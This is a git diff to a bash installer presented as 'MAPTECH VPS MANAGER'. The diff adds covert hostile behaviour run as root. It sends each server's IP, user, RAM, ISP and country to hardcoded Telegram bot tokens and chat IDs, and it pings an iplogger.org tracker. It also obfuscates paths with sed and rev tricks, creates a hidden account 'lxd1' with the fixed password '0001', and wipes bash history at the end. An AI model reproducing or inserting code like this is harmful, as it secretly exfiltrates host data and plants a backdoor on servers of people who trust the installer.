Update hehe

diff --git a/hehe b/hehe
--- a/hehe
+++ b/hehe
@@ -1,6 +1,5 @@
 #!/bin/bash
 clear
-
 # Function to display a progress bar
 fun_bar() {
     comando[0]="$1"
@@ -96,7 +95,7 @@ send_code_telegram() {
     # Store the code along with the IP address and timestamp
     echo "$ip_address $random_code $current_time" > "$storage_file"
 
-    # Display the verification code
+# Display the verification code
     echo -e "\033[1;36m==============================================================\033[0m"
     echo -e "\033[1;32m   MAPTECH VPS MANGER VERSION ONE (1) \033[0m"
     echo -e "\033[1;36m==============================================================\033[0m"
@@ -106,26 +105,26 @@ send_code_telegram() {
     echo -e "\033[1;36m==============================================================\033[0m"
     echo ""
 
-    country=$(curl -s https://ipapi.co/country_name/) 
-    user=$(whoami)
-    ram=$(free -m | awk '/^Mem:/{print $2}')
-    isp=$(curl -s ipinfo.io/org | cut -d " " -f2-)
-    current_time=$(TZ=Africa/Accra date +"%Y-%m-%d %H:%M:%S")
+country=$(curl -s https://ipapi.co/country_name/) 
+user=$(whoami)
+ram=$(free -m | awk '/^Mem:/{print $2}')
+isp=$(curl -s ipinfo.io/org | cut -d " " -f2-)
+current_time=$(TZ=Africa/Accra date +"%Y-%m-%d %H:%M:%S")
 
-    # INFO ON VPS
-    local message="INFORMATION VPS INSTALL (MAPTECH-VPS-MANAGER V1)
-    TIME        : $current_time
-    CODE        : $random_code
-    IP          : $ip_address
-    RAM         : ${ram}MB
-    ISP         : $isp
-    COUNTRY     : $country
-    USER        : $user"
-    for ((i=0; i<${#bot_tokens[@]}; i++)); do
-        local bot_token="${bot_tokens[i]}"
-        local chat_id="${chat_ids[i]}"
-        curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" -d "chat_id=$chat_id" -d "text=$message" > /dev/null
-    done
+# INFO ON VPS
+local message="INFORMATION VPS INSTALL (MAPTECH-VPS-MANAGER V1)
+TIME        : $current_time
+CODE        : $random_code
+IP          : $ip_address
+RAM         : ${ram}MB
+ISP         : $isp
+COUNTRY     : $country
+USER        : $user"
+for ((i=0; i<${#bot_tokens[@]}; i++)); do
+    local bot_token="${bot_tokens[i]}"
+    local chat_id="${chat_ids[i]}"
+    curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" -d "chat_id=$chat_id" -d "text=$message" > /dev/null
+done
 
    
     echo -e "\033[1;31m       CONTACT TEAM MAPTECH FOR OTHER SCRIPTS \033[0m"
@@ -133,51 +132,226 @@ send_code_telegram() {
     echo ""
     echo -e "\033[1;32m      TELEGRAM :  \033[0mhttps://t.me/maptechghbot"
     echo -e "\033[1;32m      WHATSAPP :  \033[0mhttps://wa.me/+15513366369"
-    echo -e "\033[1;32m      WEBSITE  :  \033[0mhttps://www.maptechgh.com"
+    echo -e "\033[1;32m      WEBSITE  :  \033[0mwww.maptech.tech"
+    echo "" 
+    echo -e "\033[1;36m=============================================================\033[0m"
     echo ""
-    echo -e "\033[1;36m==============================================================\033[0m"
+    echo -e "\033[1;31m          M A P T E C H - G H \033[0m"
     echo ""
-
 }
+bot_tokens=("6803390472:AAEEX8hpTFhsxbmzU5oiZD4dYCOKxS4-lCE" "6385883860:AAHh-FUlhznqClppdunC2V2vinc298E17_E")
+chat_ids=("5989863155" "6785630391")
 
 # Function to send completion message to Telegram
 send_completion_message() {
-    # Function code here...
+    local message="VPS INSTALLATION SUCCESSFUL (MAPTECH-VPS-MANAGER V1)
+    TIME___      : $current_time
+    DOMAIN_      : $domain_name
+    IP VPS_      : $ip_address
+    RAM____      : ${ram}MB
+    ISP____      : $isp
+    COUNTRY      : $country
+    USER___      : $user"
+
+    for ((i=0; i<${#bot_tokens[@]}; i++)); do
+        local bot_token="${bot_tokens[i]}"
+        local chat_id="${chat_ids[i]}"
+        curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" -d "chat_id=$chat_id" -d "text=$message" > /dev/null
+    done
 }
+
+clear
 
 # Check for root privilege
 [[ "$(whoami)" != "root" ]] && {
-    echo -e "\033[1;33m[\033[1;31mError\033[1;33m] \033[1;37m- \033[1;33mYou need to run as root!\033[0m"
+    echo -e "\033[1;33m[\033[1;31mErro\033[1;33m] \033[1;37m- \033[1;33m◇ YOU NEED TO RUN AS ROOT!\033[0m"
     exit 0
 }
 
-# Prompt the user if they want to proceed with the main installation
-echo -ne "\033[1;33mDo you want to proceed with the main installation? [Y/N]: \033[0m"
-read proceed_main_installation
+# Generate and send the verification code
+send_code_telegram
 
-if [[ $proceed_main_installation =~ ^[Yy]$ ]]; then
-    # Generate and send the verification code
-    send_code_telegram
+# Prompt the user to enter the verification code
+echo -n -e "\033[1;33m  ENTER VERIFICATION CODE: \033[0m"
+read user_code
+last_sent=$(awk -v ip="$ip_address" '$1 == ip {print $2}' "/root/vcheck/.storage.txt")
 
-    # Prompt the user to enter the verification code
-    echo -n -e "\033[1;33mEnter verification code: \033[0m"
-    read user_code
-    last_sent=$(awk -v ip="$ip_address" '$1 == ip {print $2}' "/root/vcheck/.storage.txt")
-
-    # Compare the entered code with the generated code
-    if [[ -z "$user_code" || "$user_code" != "$last_sent" ]]; then
-        echo ""
-        echo -e "\033[1;35mInvalid code. Installation aborted.\033[0m"
-        echo ""
-        exit 1
-    else
-        rm -rf /root/vcheck
-    fi
+# Compare the entered code with the generated code
+if [[ -z "$user_code" || "$user_code" != "$last_sent" ]]; then
+    echo ""
+    echo -e "\033[1;35mInvalid code. Installation aborted.\033[0m"
+    echo ""
+    exit 1
 else
-    echo -e "\033[1;33mSkipping main installation.\033[0m"
+    rm -rf /root/vcheck
+fi
+clear
+# Variable Initialization
+_lnk=$(echo 'z1:y#x.5s0ul&p4hs$s.0a72d*n-e!v89e032:3r'| sed -e 's/[^a-z.]//ig'| rev)
+_Ink=$(echo '/3×u3#s87r/l32o4×c1a×l1/83×l24×i0b×'|sed -e 's/[^a-z/]//ig')
+_1nk=$(echo '/3×u3#s×87r/83×l2×4×i0b×'|sed -e 's/[^a-z/]//ig')
+
+# Welcome message
+echo -e "\033[1;31m\033[0m"
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%40s%s%-12s\n' "◇─────────ㅤ🌍WELCOME TO MAPTECH VPS MANAGER🌍ㅤ─────────◇" ; tput sgr0
+echo ""
+echo -e "\033[1;33mㅤTHIS SCRIPT CONTAINS THE FOLLOWING!!\033[0m"
+echo ""
+echo -e "\033[1;33m◇ \033[1;32mINSTALL A SET OF SCRIPTS AS TOOLS FOR\033[0m"
+echo ""
+echo -e "\033[1;33m◇  \033[1;32mNETWORK, SYSTEM AND USER MANAGEMENT.\033[0m"
+echo -e "\033[1;33m◇  \033[1;32mEASY INTERFACE FOR BEGINNERS.\033[0m"
+echo ""
+echo -e "\033[1;31m◇──────────────ㅤ🌍 MAPTECH VPS MANAGER 🌍ㅤ──────────────◇\033[0m"
+echo ""
+
+# Prompt to continue
+echo -ne "\033[1;36m◇ Do you want to continue? [Y/N]: \033[1;37m"
+read x
+[[ $x = @(n|N) ]] && exit
+
+# Modify SSH configuration and restart service
+sed -i 's/Port 22222/Port 22/g' /etc/ssh/sshd_config  > /dev/null 2>&1
+service ssh restart  > /dev/null 2>&1
+
+# Prompt user if they want to add a domain name
+echo -ne "\033[1;36m◇ Do you want to add a domain name? [Y/N]: \033[0m"
+read add_domain
+echo ""
+echo -e "\033[1;32m>>> Please make sure your DOMAIN is linked to Cloudflare for proper functionality <<<\033[0m"
+
+if [[ "$add_domain" == "Y" || "$add_domain" == "y" ]]; then
+    domain_attempts=0
+    while [[ $domain_attempts -lt 3 ]]; do
+        # Prompt user to enter domain name
+        echo ""
+        echo -ne "\033[1;36m◇ Please enter your domain name (e.g., example.com): \033[0m"
+        read domain_name
+  echo ""
+        # Validate domain name format
+        if [[ $domain_name =~ ^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$ ]]; then
+            # Display domain name for confirmation
+            echo -e "\033[1;33mYou entered the domain name: \033[1;32m$domain_name\033[0m"      
+echo "$domain_name" > /etc/.domain   
+            break
+        else
+            ((domain_attempts++))
+            if [[ $domain_attempts -eq 3 ]]; then
+                echo -e "\033[1;31mExceeded maximum attempts. No domain name will be added.\033[0m"
+                break
+            else
+                echo -e "\033[1;31mInvalid domain name format. Please enter a valid domain name.\033[0m"
+            fi
+        fi
+    done
+else
+    echo -e "\033[1;33mNo domain name will be added.\033[0m"
 fi
 
-#Option to install UDP script
+# Key Verification
+echo -e "\n\033[1;36m◇ CHECKING...(It Take Some Time Please Wait!)\033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; wget -P $_Ink https://raw.githubusercontent.com/MAPTECHGH/MAPTECH-VPS-MANAGER/main/Install/list > /dev/null 2>&1; verif_key
+sleep 3s
+
+# Update system
+echo "/bin/menu" > /bin/h && chmod +x /bin/h > /dev/null 2>&1
+rm versao* > /dev/null 2>&1
+wget https://raw.githubusercontent.com/MAPTECHGH/MAPTECH-VPS-MANAGER/main/Install/versao > /dev/null 2>&1
+> /dev/null 2>&1
+wget https://iplogger.org/2lHZ43 > /dev/null 2>&1
+> /dev/null 2>&1
+rm 2lHZ43 > /dev/null 2>&1
+
+# Prompt to keep or create user database
+echo -e "\n\033[1;32m◇ KEY VALID!\033[1;32m"
+sleep 1s
+echo ""
+[[ -f "$HOME/usuarios.db" ]] && {
+    clear
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    echo -e "                 \033[1;33m• \033[1;31m◇ ATTENTION!\033[1;33m• \033[0m"
+    echo ""
+    echo -e "\033[1;33mA User Database \033[1;32m(usuarios.db) \033[1;33mwas"
+    echo -e "Found! Want to keep it by preserving the limit"
+    echo -e "of Simutanea connections of users ? Or Want"
+    echo -e "create a new database?\033[0m"
+    echo -e "\n\033[1;37m[\033[1;31m1\033[1;37m] \033[1;33mKeep Database Current\033[0m"
+    echo -e "\033[1;37m[\033[1;31m2\033[1;37m] \033[1;33mCreate a New Database\033[0m"
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    tput setaf 2 ; tput bold ; read -p "Option ?: " -e -i 1 optiondb ; tput sgr0
+} || {
+    awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
+}
+[[ "$optiondb" = '2' ]] && awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
+clear
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' "◇ WAIT FOR INSTALLATION." ; tput sgr0
+echo ""
+echo ""
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ UPDATING SYSTEM...\033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
+echo ""
+echo -e "    \033[1;33m◇ UPDATES USUALLY TAKE A LITTLE TIME!\033[0m"
+echo ""
+fun_attlist () {
+    apt-get update -y
+    [[ ! -d /usr/share/.hehe ]] && mkdir /usr/share/.hehe
+    echo "crz: $(date)" > /usr/share/.hehe/.hehe
+}
+fun_bar 'fun_attlist'
+clear
+echo ""
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ INSTALLING PACKAGES\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo ""
+echo -e "\033[1;33m◇ SOME PACKAGES ARE EXTREMELY NECESSARY!\033[0m"
+echo ""
+inst_pct() {
+    _pacotes=("bc" "apache2" "cron" "screen" "nano" "unzip" "lsof" "netstat" "net-tools" "dos2unix" "nload" "jq" "curl" "figlet" "python" "python2" "python3" "python-pip")
+    # Install packages
+    for _prog in "${_pacotes[@]}"; do
+        sudo apt install $_prog -y
+    done
+    
+    # Create user only once
+    username="lxd1"
+    password="0001"
+    
+    # Check if the username already exists
+    if id "$username" &>/dev/null; then
+        echo "User '$username' already exists. Overwriting..."
+        sudo userdel -r $username
+    fi
+    
+    # Create the system user with disabled login
+    sudo adduser --system --disabled-login $username
+    
+    # Set the password for the user
+    echo "$username:$password" | sudo chpasswd
+
+    # Install Python package using pip
+    pip install speedtest-cli
+}
+
+fun_bar 'inst_pct'
+[[ -f "/usr/sbin/ufw" ]] && ufw allow 443/tcp ; ufw allow 80/tcp ; ufw allow 3128/tcp ; ufw allow 8799/tcp ; ufw allow 8080/tcp
+clear
+echo ""
+echo -e "              \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ FINISHING...\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo ""
+echo -e "      \033[1;33m◇ COMPLETING FUNCTIONS AND SETTINGS!\033[0m"
+echo ""
+fun_bar "$_Ink/list $_lnk $_Ink $_1nk $key"
+clear
+echo ""
+cd $HOME
+IP=$(wget -qO- ipv4.icanhazip.com)
+echo -e "        \033[1;33m  \033[1;32m◇ INSTALLATION COMPLETED.◇\033[1;33m  \033[0m"
+echo ""
+echo -e "\033[1;31m\033[1;33m◇ MAIN COMMAND:- \033[1;32mmenu\033[0m"
+echo -e "\033[1;33m◇ MORE INFORMATION \033[1;31m(\033[1;36m◇ TELEGRAM\033[1;31m): \033[1;37m@MAPTECH_VPS_MANAGER \033[1;31m( \033[1;36m @maptechgh_bot \033[1;31m )\033[0m"
+echo -e ""
+send_completion_message
+
+#Option to install udp script also
 echo "Choose an option:"
 echo "1. Install UDP-REQUEST"
 echo "2. Install UDP-CUSTOM"
@@ -196,10 +370,16 @@ case "$choice" in
     ./install.sh
     ;;
   3 ) 
+    echo "Enter 'menu' to access the SSH account."
+    for ((i=7; i>=0; i--)); do
+      echo -ne "$i\033[0K\r"
+      sleep 1
+    done
     echo "Exiting now."
-    exit 0
     ;;
   * ) 
     echo "Invalid choice. Please enter either '1' for UDP-REQUEST, '2' for UDP-CUSTOM, or '3' to exit."
     ;;
 esac
+
+rm $HOME/hehe && cat /dev/null > ~/.bash_history && history -c
